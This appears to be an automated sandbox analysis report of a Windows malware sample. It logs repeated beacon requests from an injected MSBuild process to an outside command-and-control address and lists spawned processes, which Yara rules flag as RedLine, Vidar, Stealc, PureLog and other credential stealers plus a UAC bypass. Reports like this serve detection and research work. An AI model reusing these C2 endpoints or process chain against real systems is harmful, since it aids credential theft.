Apr 25, 2024 12:17:48.346946001 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:47 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.4	49843	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:48.703310013 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:48.967856884 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:48 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.4	49844	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:49.328016043 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:49.577716112 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:48 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.4	49845	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:49.925713062 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:50.168821096 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:49 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.4	49846	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:50.520104885 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 25, 2024 12:17:50.766388893 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:49 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.4	49847	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:51.123776913 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:51.374191999 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:50 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.4	49848	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:51.728579998 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:52.006551027 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:51 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.4	49849	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:52.368738890 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 25, 2024 12:17:52.666516066 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:51 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.4	49850	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:53.039630890 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:53.289588928 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:52 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.4	49851	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:53.649964094 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:53.910357952 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:52 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.4	49852	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:54.282402992 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:54.538471937 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:53 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.4	49853	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:54.896858931 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:55.146239996 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:55 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.4	49854	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:55.508785963 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:55.759938002 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:55 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.4	49855	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:56.104549885 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:56.393384933 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:56 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.4	49856	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:56.752546072 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:57.021682024 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:56 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.4	49857	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:57.432534933 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 25, 2024 12:17:57.723408937 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:57 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.4	49858	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:58.546279907 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:17:58.806061029 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:17:58 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.4	49859	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:17:59.166407108 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:18:00.703877926 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:18:00 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.4	49860	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:18:01.080682039 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 25, 2024 12:18:01.330224991 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:18:00 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.4	49861	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:18:01.683777094 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:18:01.973433018 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:18:01 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.4	49862	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:18:02.340389013 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:18:02.620778084 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:18:01 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.4	49863	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:18:02.998764038 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:18:03.239209890 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:18:03 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.4	49864	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:18:03.596890926 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:18:04.917768955 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:18:04 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.4	49865	91.215.85.66	9000	7420	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 12:18:05.278669119 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 25, 2024 12:18:05.530338049 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Thu, 25 Apr 2024 10:18:04 GMT

Target ID:	0
Start time:	12:16:00
Start date:	25/04/2024
Path:	C:\Users\user\Desktop\R0hb7jyBcv.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\R0hb7jyBcv.exe"
Imagebase:	0x400000
File size:	421'377 bytes
MD5 hash:	74E9F3BA74C619021B87520B083C6A1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.1841736799.00000000038C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1965167409.00000000008EF000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	12:16:07
Start date:	25/04/2024
Path:	C:\Users\user\AppData\Local\Temp\u5g0.0.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\u5g0.0.exe"
Imagebase:	0x400000
File size:	285'696 bytes
MD5 hash:	19DF99C6ABEF7763427C6E25F42D5D69
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2073657722.0000000002F4C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2073537008.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000001.00000002.2073537008.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000001.00000002.2073537008.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000001.00000002.2073633195.0000000002F37000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000003.1762398985.0000000003020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000001.00000003.1762398985.0000000003020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:16:13
Start date:	25/04/2024
Path:	C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe"
Imagebase:	0x7ff7699e0000
File size:	2'469'936 bytes
MD5 hash:	9FB4770CED09AAE3B437C1C6EB6D7334
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.1869479481.0000000004212000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:16:14
Start date:	25/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2130721248.0000000005D60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000003.00000002.2130721248.0000000005D60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.2129354420.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	12:16:14
Start date:	25/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	12:16:17
Start date:	25/04/2024
Path:	C:\Users\user\AppData\Local\Temp\u5g0.3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\u5g0.3.exe"
Imagebase:	0x400000
File size:	4'866'096 bytes
MD5 hash:	397926927BCA55BE4A77839B1C44DE6E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000005.00000000.1840725174.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe, Author: Joe Security
Antivirus matches:	Detection: 4%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	12:16:17
Start date:	25/04/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7056 -s 1144
Imagebase:	0xaa0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	12:16:36
Start date:	25/04/2024
Path:	C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe"
Imagebase:	0x8c0000
File size:	2'469'936 bytes
MD5 hash:	9FB4770CED09AAE3B437C1C6EB6D7334
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.2098935400.0000000002FF9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	12:16:37
Start date:	25/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Imagebase:	0xd90000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	12:16:37
Start date:	25/04/2024
Path:	C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
Imagebase:	0x1487c920000
File size:	59'721'128 bytes
MD5 hash:	8E9C467EAC35B35DA1F586014F29C330
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000002.2977434765.000001481A580000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000F.00000002.2981594224.000001481A850000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000002.2981594224.000001481A850000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000002.2967077776.0000014811E93000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000000.2042934542.000001487C95B000.00000002.00000001.01000000.00000013.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000000.2042934542.000001487FB5B000.00000002.00000001.01000000.00000013.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	12:16:37
Start date:	25/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
